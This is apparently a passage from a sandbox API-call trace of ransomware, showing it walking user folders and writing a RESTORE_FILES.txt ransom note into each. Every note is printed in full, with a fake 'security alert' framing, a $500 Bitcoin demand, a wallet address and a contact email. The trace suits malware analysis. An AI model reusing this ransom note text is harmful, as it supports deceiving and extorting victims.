(in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.754] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\RESTORE_FILES.txt") returned 81 [0084.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.755] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.755] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.755] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.756] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.756] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.756] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.756] CloseHandle (hObject=0xd8) returned 1 [0084.756] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0084.756] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0084.756] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12") returned 63 [0084.756] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0084.756] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*") returned 65 [0084.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.757] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.757] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.757] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.757] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.757] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\.") returned 65 [0084.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.757] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\..") returned 66 [0084.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.757] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.757] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 81 [0084.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.758] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.758] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.759] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.759] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.759] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.759] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.759] CloseHandle (hObject=0xd8) returned 1 [0084.759] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0084.759] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0084.759] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12") returned 64 [0084.759] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0084.759] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*") returned 66 [0084.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.760] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.760] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.760] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.760] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.760] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.760] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\.") returned 66 [0084.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.760] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.760] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.761] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.761] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\..") returned 67 [0084.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.761] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.761] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.761] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 82 [0084.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.761] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.761] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.762] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.762] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.762] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.763] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.763] CloseHandle (hObject=0xd8) returned 1 [0084.763] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 [0084.763] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1") returned 65 [0084.763] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0084.763] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0084.763] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*") returned 67 [0084.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.766] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.766] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.766] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.766] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.766] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.766] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\.") returned 67 [0084.766] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.766] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.766] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.767] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\..") returned 68 [0084.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.767] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 83 [0084.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.767] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.767] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.768] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.768] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.768] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.768] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.768] CloseHandle (hObject=0xd8) returned 1 [0084.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0084.769] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0") returned 65 [0084.769] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0084.769] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0084.769] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*") returned 67 [0084.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.769] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.769] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.769] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.769] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.769] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\.") returned 67 [0084.769] 